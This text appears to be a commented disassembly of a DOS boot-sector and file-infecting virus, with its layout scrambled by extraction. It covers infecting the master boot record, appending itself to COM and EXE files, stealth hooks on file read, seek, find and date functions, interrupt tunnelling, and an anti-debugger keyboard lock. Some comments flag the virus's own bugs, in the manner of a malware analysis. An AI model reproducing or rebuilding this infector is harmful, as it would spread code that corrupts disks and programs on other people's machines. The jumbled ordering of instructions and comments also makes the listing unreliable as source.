MOV MOV

CX, 4 DI, 1BEh

; Maximum of 4 partitions. ; Start of partition info.

Find_Act_Part:

TEST JNZ

BYTE PTR [BX+DI], 80h Chk_Partition

; It's the active partition?

ADD

DI, 16

; Next partition.

LOOP

Find_Act_Part

; Check all partitions.

POP MOV

DS DX, DS

; Restore PSP. ; Save PSP in DX.

POP ES

Run_Host:

POP ES ; This host is of EXE-type? CMP JE

CS:[SI+(Host_Header-Boot_Loader)], 'ZM' Restore_EXE

; Restore .COM-file in memory and execute it. ADD MOV

SI, (Host_Header-Boot_Loader) DI, 100h

PUSH PUSH

CS DI

; Push entrypoint of host ; *** CS mod ain't needed.

MOVSB MOVSW

; Restore first 3 bytes of ; the host.

XOR XOR XOR XOR XOR XOR

AX, BX, CX, DX, SI, DI,

AX BX CX DX SI DI

XCHG

BP, AX

RETF

; Clear registers.

; Restore FCB status in AX. ; Jump to the host.

Run_Old_Boot: XOR MOV

CX, CX ES, CX

; Zero ES.

MOV MOV MOV MOV

AX, BX, CX, DX,

; Read the standard MS-DOS ; bootsector.

0201h 7C00h 1 0180h

PUSH

Restore_EXE:

INT

13h

PUSH BX RETF

ES

; And go execute it.

ADD

DX, (100h/16)

; Get effective segment.

; Update old CS & SS with it. ADD ADD

CS:[SI+(EXE_CS-Boot_Loader)], DX DX, CS:[SI+(EXE_SS-Boot_Loader)]

; Restore host's original stack. MOV MOV

SS, DX SP, CS:[SI+(EXE_SP-Boot_Loader)]

XCHG

BP, AX

; Restore AX (FCB status).

; Jump to the host's original entrypoint.

Chk_Partition:

PUSH POP DS

JMP

DWORD PTR CS:[SI+(EXE_IP-Boot_Loader)]

INC

DI

MOV MOV

ES:[600h+(Act_Partition-File_Int21h)], DI DS:[SI+(Act_Partition-Boot_Loader)], DI

MOV

AX, 0200h

; Head 0, sector 2 (where ; the virusbody is located).

CMP JE

DS:[BX+DI], AX Run_Host

; MBS is already infected? ; Then just bail out.

MOV

DS:[BX+DI], AX

; Point partition's boot; sector to virusbody.

CS

CLC Swap_Boot_ID:

; Start of partition.

; No errors so far..

MOV

AX, 0AA55h

; Bootsector ID.

XCHG

DS:[SI+510], AX

; Swap-in bootsector ID.

PUSH JC

AX Chk_If_Unhook

; Save original word. ; Error occurred?

; Save original word in virusbody. MOV PUSH POP ES

[SI+(Original_Word-Boot_Loader)], AX

CS

MOV MOV MOV INT JC

AX, 0301h CX, 1 DX, 80h 03h Chk_If_Unhook

; Write patched MBS back ; to disk.

; Write the virusbody to the zero-track.

Chk_If_Unhook:

PUSH

MOV MOV MOV INT

AX, 0300h + (Virus_Size_512) BX, SI CX, 2 03h

MOV MOV MOV

AX, 0 ES, AX DS, AX

; Zero DS & ES (without ; changing any flags).

JNC

Restore_Int03h

; Harddisk was succesfully ; infected? If not, unhook ; the INT 13h stealth.

MOV MOV MOVSW MOVSW

SI, 600h+(Old_Int13h-File_Int21h) DI, (13h*4)

SI CLD CLI

Restore_Int03h: POP PUSH SI PUSH POP DS

SI

CS

; Restore INT 03h. ADD MOV MOVSW MOVSW

SI, (Old_Int03h-Boot_Loader) DI, (03h*4)

STI POP SI POP

DS:[SI+510]

JMP

Run_Host

; Restore original word.

; Called with ES:BX as vector address of INT 13h. Tunnel_Int13h: PUSHF ; Not necessary to tunnel from boot. CMP JE

BYTE PTR CS:[SI+(Origin-Boot_Loader)], Boot Push_CS_IP

POPF

PUSH Push_CS_IP: PUSH

MOV AX

AX, 300h

; Flags, TF & IF enabled.

PUSH BX

ES

; Untunneled INT 13h.

MOV MOV New_Int01h:

PUSH

PUSH PUSH

PUSH

AH, 01h DL, 80h

; Get status byte. ; 1st HDD.

PUSH MOV

BP BP, SP

; Setup a stack pointer.

PUSH AX

BX

; Save scrap registers.

MOV

BX, CS

; *** Not used.

MOV

AX, [BP+(2*2)]

; Get segment of next ; instruction.

CMP JA

AX, 70h Exit_Int01h

; In the DOS kernel? ; If not then get out.

XOR MOV

BX, BX DS, BX

; DS = IVT.

MOV

DS:[(13h*4)+2], AX

; Set tunneled address in ; IVT.

MOV MOV

BX, [BP+(1*2)] DS:[(13h*4)], BX

; And the IP..

CLI

DS ES

DI CALL

Get_Delta_1

Old_Int03h

DW

0, 0

Get_Delta_1:

POP

DI

; POP delta offset.

XCHG XCHG STOSW

BX, AX DS:[(03h*4)], AX

; Revector the tunneled ; INT 13h to INT 03h.

XCHG XCHG STOSW

BX, AX DS:[(03h*4)+2], AX

PUSH

DS

PUSH POP ES

CS

CLD

; ES = IVT.

POP ES PUSH

SI ; Unhook INT 01h. MOV MOV MOVSW

SI, 600h+(Old_Int01h-File_Int21h) DI, (01h*4)

MOVSW POP SI POP DI POP ES POP DS Exit_Int01h: POP BX POP BP

POP

AX

STI

; Restore registers.

; *** Useless instruction.

IRET

ComSpec_String ComSpec_Value ComSpec_Length

DB DB DW

'COMSPEC=' 13 DUP (0) 0

PUSH PUSH

DS AX

XOR MOV

AX, AX DS, AX

; DS = IVT.

CMP JA

DS:[(21h*4)+2], 1000h Exit_Int08h

; DOS hasn't grabbed INT 21h ; yet? Then wait some more..

PUSH PUSH PUSH

ES SI DI

PUSH POP

CS ES

MOV MOV NOP

AX, CS DI, OFFSET Old_Int21h+2

New_Int08h:

STD CLI XCHG STOSW

; Hook INT 21h. AX, DS:[(21h*4)+2]

MOV XCHG STOSW

AX, OFFSET Boot_Int21h AX, DS:[(21h*4)]

PUSH PUSH POP POP

DS ES DS ES

; Swap DS & ES.

MOV MOV MOVSW MOVSW

SI, DI DI, (08h*4)+2

; Unhook INT 08h.

STI

POP POP POP

DI SI ES

POP POP

AX DS

JMP

DWORD PTR CS:Old_Int08h

PUSH PUSH

DS AX

XOR MOV

AX, AX DS, AX

; DS = IVT.

MOV

AX, DS:[(01h*4)]

; Offset of INT 01h's ISR.

CMP JNE

AX, DS:[(03h*4)] Lock_Keyboard

; Same as INT 03h's ?

MOV

AX, DS:[(01h*4)+2]

; Segment of INT 01h's ISR.

CMP JE

AX, DS:[(03h*4)+2] Exit_No_Debug

; Same as INT 03h's ? ; If INT 01h != INT 03h then ; a debugger is active.

Lock_Keyboard:

MOV OUT

AL, 10000010b 21h, AL

; Disable keyboard & printer.

Exit_No_Debug: POP DS

POP

AX

Test_11h_12h:

CMP JE

AH, 11h Do_FCB_Stealth

; Findfirst (FCB) ?

CMP JNE

AH, 12h Check_4_Create

; Findnext (FCB) ?

Exit_Int08h:

Boot_Int21h:

; ; ; ;

This is the FCB stealth The rest of of the Rock

Do_FCB_Stealth: CALL

Do_Old_Int21h

; Do the filefind.

AL, AL IRET_FCB_St

; Error?

MOV CALL

AH, 51h Do_Old_Int21h

; Obtain current PSP.

MOV

ES, BX

CMP JNE

BX, ES:[16h] Exit_FCB_St

TEST JNZ PUSH PUSH PUSH

routine Rock Steady/NuKE used in his tut, with one or two bytes changed. the code also shows a certain influence Steady tuts.

ES AX BX

; Owner PSP == PSP ? (ie. is ; command interpreter?).

MOV MOV PUSH

BX, DX AL, [BX]

; Get first byte of FCB.

AX MOV CALL

AH, 2Fh Do_Old_Int21h

; Obtain current DTA.

INC JNZ

AL Test_Seconds

; It's an extended FCB ?

ADD

BX, 7

; Then skip extended stuff.

MOV

AX, ES:[BX.FCB_Time]

; Grab time word.

AND

AX, 0000000000011111b

; Mask out seconds value.

XOR JNZ

AL, (60/2) Exit_FCB_St

; 60 seconds? (infected?).

POP AX

Test_Seconds:

; Set the seconds value in the DTA to 2. AND OR

BYTE PTR ES:[BX.FCB_Time], 11100000b BYTE PTR ES:[BX.FCB_Time], (2/2)

; Subtract the virussize from the filesize. SUB SBB

ES:[BX.FCB_Size], Virus_Size ES:[BX.FCB_Size+2], AX

Exit_FCB_St: POP AX POP ES

POP

BX

IRET_FCB_St:

IRET

Check_4_Create: CMP JE

AH, 3Ch Set_RW_BX

; ; ; ;

CMP JE

AH, 3Dh Set_RW_AL

; Open file? ; Go infect it.

CMP JNE

AH, 3Eh Check_4_Read

; Close file?

JMP

Infect_3E

; Infect it if it was ; a newly created file.

CMP JE

AH, 3Fh J_Go_Chk_Secs

; Read file? ; Stealth the read.

CMP JE

AH, 40h J_Go_Chk_Secs

; Write file? ; Disinfect the file.

CMP JNE

AH, 42h Check_4_Exec

; Seek file?

CMP JB

AL, 02h J1_J_Old_i21h

; Seek EOF relative?

Check_4_Read:

Create/truncate file? Then save it's handle so it can be infected on close.

J_Go_Chk_Secs:

JMP

Go_Check_Secs

; Stealth stuff.

Check_4_Exec:

CMP JNE

AH, 4Bh Check_4_Exit

; Execute/load file?

CMP JB

AL, 02h CALL_Do_Infect

; It's either 4B00h or 4B01h? ; Else don't infect.

JMP

SHORT J1_J_Old_i21h

CMP JE

CS:Windows_Active, 1 J1_J_Old_i21h

; Is Windoze running? Then ; don't do anything.

CMP JNE

AX, 3D01h CALL_Do_Infect

; Open file, write-only?

INC

AL

; ; ; ;

CALL_Do_Infect: CALL

Do_Infect

; Infect it.

J1_J_Old_i21h:

JMP

JMP_Old_Int21h

Check_4_Exit:

CMP JNE

AH, 4Ch Check_4_Date_T

; Program terminate?

JMP

Check_Win_Exit

; Go check if it's Windoze.

Check_4_Date_T: CMP JNE

AH, 57h Chk_4_Create_N

; Get/set file date & time?

Stealth_Seconds

; Don't let em fuck with the ; seconds.

AH, 5Bh Set_RW_BX

; Create new file? ; Save it's handle for later.

CMP JNE

AX, 6C00h Chk_4_Res_Chk

; Extended open/create?

CMP JE

CS:Windows_Active, 1 J1_J_Old_i21h

; Is Windoze up and running? ; Then abort any infection.

CMP JNE

AX, 6C00h Save_Handle

; Don't infect on create.

OR AND

BL, 00000010b BL, 11111110b

; Change access mode to ; read/write.

MOV CALL

DX, SI Do_Infect

; DX = offset filepath.

PUSH ES AX CX SI

BX

Set_RW_AL:

JMP

Chk_4_Create_N: CMP JE

Set_RW_BX:

PUSH PUSH

Save_Handle: PUSH PUSH PUSH PUSH

Then change access mode to read/write so the virus can read from it when it wants to disinfect it.

BX DX

PUSH

DI

PUSH POP ES

DS

CALL

Get_End_DX

STD MOV

SI, DI

LODSB LODSW

PUSH PUSH

; SI = last word extension.

CALL

Check_Extension

; .COM/EXE extension?

MOV

CS:Valid_Handle, CL

; Mark handle as invalid (0).

JNE

Do_Open_Create

INC MOV

CX CS:Valid_Handle, CL

Do_Open_Create: POP POP SI POP CX POP AX POP ES POP BX POP DX PUSH

; Go to end of path.

; Mark handle as valid (1).

DI

AX CALL JC

Do_Old_Int21h Clear_Inf_Hand

; Do the open/create call.

INC INC

SP SP

; Remove the top word on ; the stack.

XCHG

BX, AX

; Save the new filehandle.

MOV CALL

AX, 5700h Do_Old_Int21h

; Get file's date & time.

CALL

Check_60_Secs

; It's infected?

XCHG

BX, AX

JNE

Save_Inf_Hand

MOV

CS:Valid_Handle, AL

; Mark handle as valid (> 0).

MOV

CS:File_Handle, AL

; Save this filehandle.

JMP

IRET_Flags

CX DX

POP DX POP CX

Save_Inf_Hand: POP BX

Clear_Inf_Hand: MOV POP AX

CS:Valid_Handle, 0

; Reset handle-valid boolean.

POP BX JMP

JMP_Old_Int21h

CMP JE

AX, 0EEE7h Return_ID_1

JMP

JMP_Old_Int21h

Return_ID_1:

MOV

AH, 0D7h

; Return ID in AX and return.

New_Int24h:

MOV IRET

AL, 03h

; Fail silently.

MOV

DI, DX

XOR MOV CLD REPNZ

AL, AL CL, 128

Chk_4_Res_Chk:

; It's the virus' TSR check?

Get_End_DX:

Get_End_DI:

; Scan to the end of the ; filepath.

SCASB

RETN

Do_Infect: PUSH PUSH PUSH PUSH PUSH PUSH PUSH

ES BX CX SI DI DS DX

PUSH POP ES

DS

PUSH

AX CALL

Get_End_DX

DEC

DI

; DI = last byte of filename.

DEC DI PUSH POP DS

CS

MOV MOV STD PUSH Comp_ComSpec:

CX, ComSpec_Length SI, OFFSET ComSpec_String+8+12

DI LODSB MOV

; Save ComSpec byte in AH. AH, AL

XCHG

SI, DI

LODS

BYTE PTR ES:[SI]

XCHG

SI, DI

AND

AX, 5F5Fh

; Fetch byte from filename.

; Convert word to uppercase.

CMP JNE

AH, AL Go_Check_Ext

LOOP

Comp_ComSpec

POP

DI

JMP

Exit_Infect

; Bytes match? ; If not it's not ComSpec.

; If it get's to here, the ; file is the COMSPEC, and ; infection is denied.

; Returns ZF if file has COM/EXE extension. Check_Extension: MOV CX, 2 Get_Extension:

LODS

WORD PTR ES:[SI]

AND

AX, 5F5Fh

XCHG

BX, AX

LOOP

Get_Extension

CMP JNE

AX, 'MO' Check_For_EXE

CMP

BX, 'C.' AND 5F5Fh

CMP JNE

AX, 'EX' Exit_Check_Ext

CMP

BX, 'E.' AND 5F5Fh

; Uppercase.

RETN Check_For_EXE:

Exit_Check_Ext: RETN Go_Check_Ext:

POP DEC

SI SI

; SI = last byte of filename. ; SI = last word of filename.

POP AX

AX

; AX on entry.

CMP PUSHF

AX, 4B00h

; Program execute?

CALL JE

Check_Extension Go_Chk_Win_Act

; File has COM/EXE extension?

POPF JE

Find_File_Name

JMP

Exit_Infect

Windows_Active

DB =

'CHKDSK', 0 BYTE PTR $-1

Mem_String

DB =

'MEM' $-1

PUSH

Go_Chk_Win_Act: POPF JNE

Check_Windows

Find_File_Name: INC

SI

; DI = byte before dot.

MOV

DI, SI

INC

SI

; SI = extension dot.

MOV SUB

CX, SI CX, DX

; Calculate path length.

XCHG

SI, DI

Chk_Start_Name: LODS

BYTE PTR ES:[SI]

; Fetch a byte from path.

CMP JE

AL, '\' Get_Start_Name

; Path seperator? Then start ; of filename is found.

LOOP

Chk_Start_Name

JNE

Chk_File_Name

Get_Start_Name: INC INC SI

Chk_File_Name:

SI

MOV

DX, SI

MOV SUB

CX, DI CX, DX

; Calculate length of ; filename without extension.

DEC MOV

DI SI, OFFSET Mem_String

; DI = last byte of filename.

CMP JE

CX, 3 Compare_Byte

; Can it be 'MEM' ?

LODSW LODSW CMP JNE Compare_Byte:

; ; ; ;

; SI = start of filename.

; SI = 'CHKDSK' string.

CX, 6 Check_Windows

; Can it be 'CHKDSK' ?

LODSB MOV

; Fetch byte of filename and ; save it in AH.

AH, AL

XCHG

SI, DI

LODS

BYTE PTR ES:[SI]

; Fetch byte of match string.

AND

AX, 5F5Fh

; Convert to uppercase.

CMP JNE

AH, AL Check_4_Win

; Bytes are the same? ; If not, skip this shit.

XCHG

SI, DI

LOOP

Compare_Byte

Now that either MEM or CHKDSK are about to be executed, the virus will temporarily hook INT 12h to stealth the total amount of DOS memory available, which these programs will display. MOV MOV

NOP

AX, OFFSET New_Int12h DI, OFFSET Old_Int12h

MOV PUSH POP ES

DS, CX

; DS = IVT.

XCHG STOSW

DS:[(12h*4)], AX

; Save & hook INT 12h.

MOV XCHG STOSW

AX, CS DS:[(12h*4)+2], AX

CS

CLD CLI

Check_4_Win:

Check_Windows:

STI JMP

SHORT Check_Windows

CMP JNE

CX, 3 Check_Windows

; Can it be 'WIN.COM' ?

CMP JNE

AL, 'N' Check_Windows

; (WI)N ?

DEC LODS

SI WORD PTR ES:[SI]

; SI = 1st word of filename.

AND

AX, 5F5Fh

; Uppercase.

CMP JNE

AX, 'IW' Check_Windows

; So it's WIN.COM ?

MOV

Windows_Active, 1

; Set Windoze-active flag.

CMP JE

CS:Windows_Active, 1 Exit_Infect

; Don't infect under Windoze.

XOR MOV

CX, CX DS, CX

; DS = IVT.

LES ES BX

BX, DS:[(24h*4)]

; Save original INT 24h.

CLI

PUSH PUSH

; Install own dummy critical-error handler. MOV MOV

DS:[(24h*4)], OFFSET New_Int24h DS:[(24h*4)+2], CS

STI PUSH

DS PUSH MOV

BP BP, SP

; Setup stackframe.

LDS

DX, [BP+(5*2)]

; DS:DX = path of file.

POP BP PUSH

DS

PUSH

DX MOV CALL CX JC

AX, 4300h Do_Old_Int21h

TEST JZ

CL, 00000001b Open_File

; Readonly bit set?

DEC

CX

; Remove readonly bit.

MOV CALL

AX, 4301h Do_Old_Int21h

; Set new attributes.

MOV CALL JC

AX, 3D02h Do_Old_Int21h Restore_Attr

; Open target file for r/w.

XCHG

BX, AX

; Save filehandle in BX.

MOV CALL JC

AX, 5700h Do_Old_Int21h Close_File

; Get file date & time.

CALL JE

Check_60_Secs Close_File

; Already infected?

PUSH PUSH

CX DX

; Save original filedate & ; time with 60 seconds set.

CALL

Infect_Handle

; Infect the handle.

JC

Close_File

; Error occurred?

MOV CALL

AX, 5701h Do_Old_Int21h

; Restore file date & time ; with 60 seconds.

Close_File:

MOV CALL

AH, 3Eh Do_Old_Int21h

; Close the file.

Restore_Attr: POP DX POP DS

POP

CX

; File path & attributes.

JC

Restore_Int24h

; Error occurred?

TEST JZ

CL, 00000001b Restore_Int24h

; Need to restore the ; readonly flag?

MOV CALL

AX, 4301h Do_Old_Int21h

; Fix file-attributes.

PUSH

Open_File:

; Get file's attributes.

Restore_Attr

POP DX POP CX

Restore_Int24h: POP POP BX POP AX MOV MOV

DS

DS:[(24h*4)], BX DS:[(24h*4)+2], AX

; Restore INT 24h.

Exit_Infect: POP DX POP DS POP DI POP SI POP CX POP BX POP ES

POP

AX

RETN

Infect_Handle: PUSH POP DS

CS

MOV

DX, OFFSET Buffer

; Read file's header.

MOV MOV CALL

CX, 24 AH, 3Fh Do_Old_Int21h

SUB JNZ

CX, AX Error_Exit_Inf

; All bytes were read?

PUSH

DS

; ES = CS.

XCHG

CX, AX

; CX = 24.

MOV MOV CLD REP

SI, DX DI, OFFSET Host_Header

; Save a copy of the original ; header.

MOV MOV

DI, DX SI, OFFSET EXE_Data

NOP

POP ES

MOVSB ; DX = header.

; Save host's original SS:SP. LES

AX, DWORD PTR [DI.Program_SS]

MOV MOV

[SI+(EXE_SP-EXE_Data)], ES [SI+(EXE_SS-EXE_Data)], AX

; Save host's original CS:IP.

Check_For_MZ:

LES

AX, DWORD PTR [DI.Program_IP]

MOV MOV

[SI+(EXE_IP-EXE_Data)], AX [SI+(EXE_CS-EXE_Data)], ES

MOV

Host_Type, CL

; Initialize file as .EXE.

MOV

AX, 'MZ'

; EXE marker.

CMP XCHG JNE

AX, [DI.EXE_ID] AH, AL Check_For_MZ

; .EXE-ID is 'ZM' ? ; Change .EXE-ID to 'MZ'.

MOV

[DI.EXE_ID], AX

; Set .EXE-ID to 'MZ'.

CMP

AX, [DI.EXE_ID]

; 'MZ' .EXE-file?

JE

Save_File_Size

INC

Host_Type

; Mark as .COM-file.

AX, 4202h DX, CX Do_Old_Int21h Exit_Inf_Hand

; Seek to EOF.

Save_File_Size: MOV MOV CALL JC

; Remember size of host for later use. MOV MOV

[DI+(Host_Size-Buffer)], AX [DI+(Host_Size-Buffer)+2], DX

CMP JE

Host_Type, EXE Check_Header

; File is .EXE-type? Then ; size check ain't needed.

CMP JB

AX,-(Virus_Size+264h) Append_Body

; .COM-file ain't too big?

Error_Exit_Inf: STC

; Else mark error.

Exit_Inf_Hand:

RETN

Check_Header:

PUSH

DI

MOV

CX, 9

MOV DEC

SI, [DI.File_512_Pages] ; Filesize in 512-byte pages. SI ; Undo 512-byte round.

XOR

DI, DI

; DI:SI = imagesize.

SHL RCL LOOP

SI, 1 DI, 1 Mul_512

; Calculate imagesize in ; DI:SI.

CMP

DX, DI

; High word doesn't match?

JNE

Error_Exit_Inf

; Then it's an overlay.

ADD

SI, [DI.Image_Mod_512]

; Image size remainder.

Mul_512:

POP DI

; Low word of filesize doesn't match?

Append_Body:

CMP JNE

SI, [DI+(Host_Size-Buffer)] Error_Exit_Inf

CMP SBB JC

AX, Virus_Size DX, 0 Exit_Inf_Hand

XOR

DX, DX

CMP JE

DX, [DI.Max_Size_Mem] Error_Exit_Inf

; Can't have a NULL maximum ; memory requirement.

MOV MOV CALL JC

CX, Virus_Size AH, 40h Do_Old_Int21h Exit_Inf_Hand

; Append virusbody to file.

SUB

CX, AX

; Were all bytes written?

; .EXE can't be smaller than ; the virus itself.

Infect_EXE:

PUSH

Mul_16:

JNZ

Error_Exit_Inf

; Else mark as failure.

MOV

DX, CX

; *** DX is already zero.

MOV CALL JC

AX, 4200h Do_Old_Int21h Exit_Inf_Hand

; Seek to BOF.

MOV

AX, [DI+(Host_Size-Buffer)]

CMP JE

Host_Type, COM Infect_COM

MOV

DX, [DI+(Host_Size-Buffer)+2]

MOV DI MOV XOR

CX, 4

SHL RCL LOOP

SI, 1 DI, 1 Mul_16

; Calculate headersize.

SUB SBB

AX, SI DX, DI

; Calculate imagesize.

MOV SHL

CL, 12 DX, CL

; 64k's DIV 4096 to get the ; new CS.

MOV MOV

[DI.Program_IP], AX [DI.Program_CS], DX

ADD

DX, 3408/16

MOV MOV

[DI.Program_SP], AX [DI.Program_SS], DX

ADD MOV

[DI.Min_Size_Mem], 448/16 AX, [DI.Min_Size_Mem]

CMP JB

AX, [DI.Max_Size_Mem] Calc_New_Img_S

; MaxMemSize must be atleast ; MinMemSize.

MOV

[DI.Max_Size_Mem], AX

; MaxMemSize == MinMemSize.

SI, [DI.Header_Size] DI, DI

POP DI

Calc_New_Img_S: MOV ADD PUSH AX

; Set new stack.

AX, [DI.Image_Mod_512] AX, Virus_Size

AND

AH, 1

MOV

[DI.Image_Mod_512], AX

MOV SHR

CL, 9 AX, CL

ADD MOV

[DI.File_512_Pages], AX DX, OFFSET Buffer

; AX modulo 512.

POP AX

NOP

; AX DIV 512.

Infect_COM: NOP

MOV JMP

CX, 24 SHORT Write_Header

; Write 24 bytes (MZ-header).

MOV

DX, OFFSET Buffer

MOV MOV

DI, DX BYTE PTR [DI], 0E9h

; JMP xxxx.

SUB

AX, 3

; Calculate displacement.

INC DI

PUSH POP ES

DS

CLD STOSW

Write_Header:

; Store JMP displacement.

MOV

CX, 3

; Write 3 bytes (JMP_Virus).

MOV CALL JC

AH, 40h Do_Old_Int21h Bad_Exit

; Write modified header.

CMP JE

AX, CX Good_Exit

; All bytes were written?

Bad_Exit:

STC

Good_Exit:

RETN

; Infect the handle of a newly created file when it is closed. Infect_3E: CMP CS:File_Handle, BL ; They're closing our handle? JNE Go_Close_Hnd

PUSH PUSH PUSH PUSH PUSH PUSH PUSH PUSH

DEC CX

CMP JNE

CS:Valid_Handle, 1 Go_Close_Hnd

; Does File_Handle contain ; a valid filehandle at all?

DEC

CS:Valid_Handle

; Reset the filehandle (0).

MOV XOR XOR CALL

AX, 4200h CX, CX DX, DX Do_Old_Int21h

; Seek to file's header.

CALL JC

Infect_Handle Exit_Infect_3E

; Go infect the file.

MOV CALL

AX, 5700h Do_Old_Int21h

INC

AL

; *** Not used.

OR

CL, (62/2)

; Set 60 seconds.

DS ES AX BX CX DX SI DI

MOV CALL

AX, 5701h Do_Old_Int21h

Exit_Infect_3E: POP POP SI POP DX POP CX POP BX POP AX POP ES POP DS

DI

Go_Close_Hnd:

CALL

Do_Old_Int21h

JMP

IRET_Flags

Go_Check_Secs: PUSH PUSH PUSH PUSH PUSH PUSH PUSH

ES AX BX CX DX SI DI MOV CALL

AX, 5700h Do_Old_Int21h

OR JC

AL, AL Exit_Go_Chk_Se

CALL

Check_60_Secs

Exit_Go_Chk_Se: POP POP SI POP DX POP CX POP BX POP AX POP ES

; *** This seems fucked, CF ; is always cleared after OR.

DI

JE

Stealth_Handle

JMP

JMP_Old_Int21h

MOV

AL, CL

OR DEC

CL, (62/2) CX

XOR

AL, CL

Check_60_Secs:

RETN

Stealth_Handle: PUSH DS PUSH

DX

; Set 60 seconds.

PUSH PUSH

CX AX

PUSH POP DS

CS

MOV

Read_Count, CX

; Save CX for later use.

XOR

CX, CX

MOV

New_Read_Count, CX

MOV XOR CALL

AX, 4201h DX, DX Do_Old_Int21h

; Get current file position.

MOV MOV

File_Pos, AX File_Pos+2, DX

; Save it for later.

MOV XOR CALL

AX, 4202h DX, DX Do_Old_Int21h

; Get filesize.

SUB SBB

AX, Virus_Size DX, 0

; Get original filesize.

MOV MOV

Orig_Size, AX Orig_Size+2, DX

; Save it.

CMP JNE

AH, 42h Rest_File_Pos

; It is a seek EOF relative?

POP

CX

; CX:DX = EOF displacement.

SUB SBB CALL

DX, Virus_Size CX, 0 Do_Old_Int21h

; Do the seek relative to ; the clean filesize instead ; of the infected size.

JMP

IRET_Flags

POP AX

POP DX POP DS PUSH

CX

POP CX

JMP_Cln_Handle: JMP

Clean_Handle

Rest_File_Pos:

PUSH

AX

MOV MOV MOV CALL

AX, 4200h DX, File_Pos CX, File_Pos+2 Do_Old_Int21h

; Restore original position.

OR JNZ

DX, DX JA_Chk_Body_Rd

; They're attempting to ; access the 1st 64k ?

CMP JA_Chk_Body_Rd: JA

AX, 23 Chk_Body_Reach

; The header in particular?

POP POP CX PUSH PUSH

AX

; Restore AX & CX.

CMP JNE

AH, 3Fh JMP_Cln_Handle

; It is a read? ; Else it's a write.

MOV

AX, CX

; AX = bytes to read.

ADD

CX, File_Pos

; Calculate end offset after ; the read.

JC

Calc_Count_Hdr

; Above 64k ?

CMP JB

CX, 24 Sub_St_Size

; Does the read touch the ; entire header?

AX, 24 AX, File_Pos

; Calculate howmany bytes ; to stealth in the header.

MOV

New_Read_Count, AX

; Save the new read count.

SUB

Read_Count, AX

; The header will be read by ; the virus, so adjust the ; caller read count.

MOV MOV MOV ADD ADC CALL

AX, 4200h CX, Orig_Size+2 DX, Orig_Size DX, OFFSET Host_Header CX, 0 Do_Old_Int21h

; ; ; ; ; ;

POP

CX

; CX = howmany bytes to ; stealth in header.

BP MOV

BP, SP

LDS

DX, [BP+(3*2)]

POP

BP

MOV CALL

AH, 3Fh Do_Old_Int21h

; Read the clean header ; into the caller's buffer.

ADD ADC

File_Pos, AX File_Pos+2, 0

; Update saved position.

MOV MOV MOV CALL

DX, File_Pos CX, File_Pos+2 AX, 4200h Do_Old_Int21h

; Restore file position.

CX AX

Calc_Count_Hdr: MOV SUB

Sub_St_Size:

PUSH

PUSH

AX

PUSH POP DS

CS

PUSH PUSH

AX CX

POP CX

Seek to the host's clean header. *** The caller's header offset should be added aswell, now it screws up on header reads that don't start at offset 0.

; Read buffer of the caller.

POP AX SUB JNZ

CX, AX Error_St_Exit

; Not all bytes were read? ; Then bail.

CMP JNZ

Read_Count, 0 Chk_Body_Reach

; No more bytes need to be ; read? Then IRET back.

MOV

AX, CX

; AX = 0.

JZ

Exit_Stealth_1

POP

DX

Exit_Stealth_1: POP POP DS

DX

POP CX POP CX

Error_St_Exit: POP DX

JMP Chk_Body_Reach: POP PUSH AX

IRET_Flags AX

; Value of AX on entry.

MOV MOV

CX, File_Pos DX, File_Pos+2

; Original fileposition ; where the action starts.

CMP JB

DX, Orig_Size+2 Calc_End_Pos

; Below virus' 64k ?

CMP JBE

CX, Orig_Size Calc_End_Pos

; Below virus' code? If not, ; the virusbody gets read or ; overwritten, so stealth it.

CMP JE

AH, 40h Clean_Handle

; If it's a write then go ; disinfect the handle.

XOR JZ

AX, AX Exit_Stealth_1

; Return 0 bytes read when ; they try to read from after ; the original host.

ADD ADC

CX, Read_Count DX, 0

; Calculate end position ; after the read/write.

CMP JB

DX, Orig_Size+2 Do_Function

; Below the virusbody?

CMP JBE

CX, Orig_Size Do_Function

CMP JE

AH, 40h Clean_Handle

MOV MOV

CX, Orig_Size DX, Orig_Size+2

SUB SBB

CX, File_Pos DX, File_Pos+2

POP AX POP CX

Calc_End_Pos:

; If it's a write then ; disinfect the handle.

OR JZ

DX, DX Set_New_Byte_C

MOV SUB

CX, -1 CX, New_Read_Count

Set_New_Byte_C: MOV

Read_Count, CX

Do_Function: POP CX POP DX POP DS PUSH

AX

PUSH PUSH

POP

; *** Obsolete instruction.

CX AX DX MOV ADD CALL

CX, CS:Read_Count DX, CS:New_Read_Count Do_Old_Int21h

ADD

AX, CS:New_Read_Count

CMP JE

CH, 3Fh Exit_Stealth_2

; It aint a read? Then it's ; a get/set filedate & time.

MOV CALL

AX, 5700h Do_Old_Int21h

; Get file's date & time.

INC OR

AL CL, (62/2)

; AX = 5701h. ; Set 60 seconds.

CALL

Do_Old_Int21h

POP DX POP CX

PUSH PUSH

AX DX

DEC CX

POP DX POP AX Exit_Stealth_2: POP JMP

CX IRET_Flags

Clean_Handle: MOV MOV

WORD PTR Valid_Handle, 0001h File_Handle, BL

MOV MOV MOV ADD ADC CALL

AX, 4200h CX, Orig_Size+2 DX, Orig_Size DX, OFFSET Host_Header CX, 0 Do_Old_Int21h

; Seek to the old header.

MOV MOV MOV

AH, 3Fh CX, 24 DX, OFFSET Buffer

; Read it in.

CALL

Do_Old_Int21h

NOP

MOV MOV MOV CALL

AX, 4200h DX, Orig_Size CX, Orig_Size+2 Do_Old_Int21h

; Seek to the old EOF.

MOV XOR CALL

AH, 40h CX, CX Do_Old_Int21h

; Write new EOF marker.

MOV XOR XOR CALL

AX, 4200h CX, CX DX, DX Do_Old_Int21h

; Seek to BOF.

MOV MOV MOV

AH, 40h CX, 24 DX, OFFSET Buffer

; Restore old header.

CALL

Do_Old_Int21h

MOV MOV MOV CALL

AX, 4200h DX, File_Pos CX, File_Pos+2 Do_Old_Int21h

JMP

SHORT JMP_Old_Int21h

POP POP

BX CX

; Remove return IP off stack. ; POP program's return CS.

DEC MOV

CX DS, CX

; Get program's MCB.

MOV

SI, 8

; SI = name of terminating ; program.

NOP

POP POP POP POP

; Restore original file pos.

AX CX DX DS

Check_Win_Exit:

PUSH PUSH PUSH

CX BX AX

CLD LODSW XCHG

; Fetch 1st word of filename. BX, AX

LODSW XCHG

DX, AX

CMP JNE

BX, 'IW' J2_J_Old_i21h

CMP JNE

DX, 'N' J2_J_Old_i21h

; Fetch 2nd word of filename.

POP AX ; Is it WIN.COM that's ; terminating?

J2_J_Old_i21h:

DEC

CS:Windows_Active

JMP

SHORT JMP_Old_Int21h

; If so, reset the flag.

Stealth_Seconds: PUSH AX PUSH CX PUSH DX MOV CALL PUSH PUSH

